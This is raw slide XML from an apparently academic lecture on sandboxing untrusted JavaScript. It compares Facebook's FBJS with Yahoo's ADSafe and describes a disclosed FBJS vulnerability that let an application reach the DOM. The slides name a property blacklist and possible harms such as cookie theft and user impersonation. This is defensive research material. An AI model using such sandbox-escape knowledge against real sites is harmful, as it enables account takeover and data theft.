              <a:rPr lang="en-US" sz="3600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="960000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ADSafe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="960000"/>
              </a:solidFill>
            </a:endParaRPr>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37</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t>Comparison with FBJS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="134147" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>FBJS enforcement mechanism.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>All application variables get prefixed by an application-specific identifier: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t> x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>;  becomes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t> a12345_x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Global object isolated by analogous to J(B)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3500" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>G</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> check.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Blacklist </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>constructor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, and wrap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>valueOf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>sort</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>reverse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Blacklisting enforced by filtering, and a rewriting similar to e1[IDX(e2)].</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>After bug fixes, similar to our safe subset, but</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Our proofs increase confidence in the correctness.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We preserve the semantics of variable renaming and e1[e2]. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We could include </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, with; have more permissive IDX. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Limitation: we do not deal with details of DOM wrapping.</a:t>
            </a:r>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38</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19075" y="52387"/>
            <a:ext cx="8162925" cy="1090613"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sample </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Facebook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> vulnerability</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="139270" name="Picture 6" descr="&#10;before.pdf                                                     003646DDMacintosh HD                   C27C8CF9:"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="742950" y="1219200"/>
            <a:ext cx="3381375" cy="2705100"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="139271" name="Picture 7" descr=" after.pdf                                                      003646DDMacintosh HD                   C27C8CF9:"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4876800" y="1202213"/>
            <a:ext cx="3428158" cy="2722087"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="139269" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="4076700"/>
            <a:ext cx="8110537" cy="2247900"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>FBJS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>e1[IDX(e2)]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> did not correctly convert objects to strings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Exploit: we built an FBJS application able to reach the DOM. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Disclosure: we notified </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>Facebook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>; they promptly patched FBJS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Potential for damage is considerable.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Steal cookies or authentication credentials</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Impersonate user: deface or alter profile, query personal information, spam friends, spread virally. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Date Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Kanellakis Lecture, Brown Univ.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{4E2AA834-4547-4FCC-B1EF-1E61DDAC4BF4}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Sandboxing Untrusted JavaScript</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0" y="304800"/>
            <a:ext cx="5592746" cy="6324600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524000" y="304800"/>
            <a:ext cx="5593080" cy="6347460"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:no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Yahoo! AdSafe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33795" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Goal: Restrict access to DOM, global object</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>harder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> problem than SNS applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Advertising network must screen advertisements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Publishing site is not under control of ad network</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="33796" name="Picture 4" descr="adsafe"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7391400" y="152400"/>
            <a:ext cx="1752600" cy="858976"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4271089" y="2950757"/>
            <a:ext cx="1392809" cy="124024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800" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Content</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6019800" y="2667000"/>
            <a:ext cx="2199173" cy="180753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800" b="1" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="679107" y="3216571"/>
            <a:ext cx="879669" cy="318977"/>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dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Ad</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="509588" y="2209800"/>
            <a:ext cx="1511931" cy="322300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Advertiser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2316269" y="2209800"/>
            <a:ext cx="1708941" cy="322300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Ad Network</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4271089" y="2209800"/>
            <a:ext cx="1414190" cy="322300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Publisher</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6470262" y="2209800"/>
            <a:ext cx="1264524" cy="322300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Flowchart: Magnetic Disk 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2218528" y="2581940"/>
            <a:ext cx="1466115" cy="1541721"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartMagneticDisk">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800" b="1" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2511751" y="3166730"/>
            <a:ext cx="879669" cy="31897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dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Ad</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4491006" y="3163408"/>
            <a:ext cx="879669" cy="31897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dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Ad</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Rectangle 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6470263" y="2900917"/>
            <a:ext cx="1302138" cy="9852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800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Content</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rectangle 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6690179" y="3003920"/>
            <a:ext cx="879669" cy="31897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dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Ad</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Right Arrow 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1632082" y="3269733"/>
            <a:ext cx="513140" cy="15948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800" b="1" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Right Arrow 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3757949" y="3269733"/>
            <a:ext cx="513140" cy="15948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800" b="1" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Right Arrow 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5810510" y="3219893"/>
            <a:ext cx="513140" cy="15948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800" b="1" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Date Placeholder 21"/>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23" name="Slide Number Placeholder 22"/>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40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Footer Placeholder 23"/>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err="1" smtClean="0"/>
              <a:t>ADSafe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Subtlety</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34819" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Isolation methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Filtering: forbid </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Require special program idioms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Access property p of object o by calling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ADSAFE.get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(o, p)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>AdSafe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> restriction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>"All interaction with the trusted code must happen only using the methods in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ADSafe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> object."</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This may be complicated !</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>                // Somewhere in trusted code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>                </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1" smtClean="0"/>
              <a:t>Object.prototype.toString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t> = function() { ... };</a:t>
            </a:r>
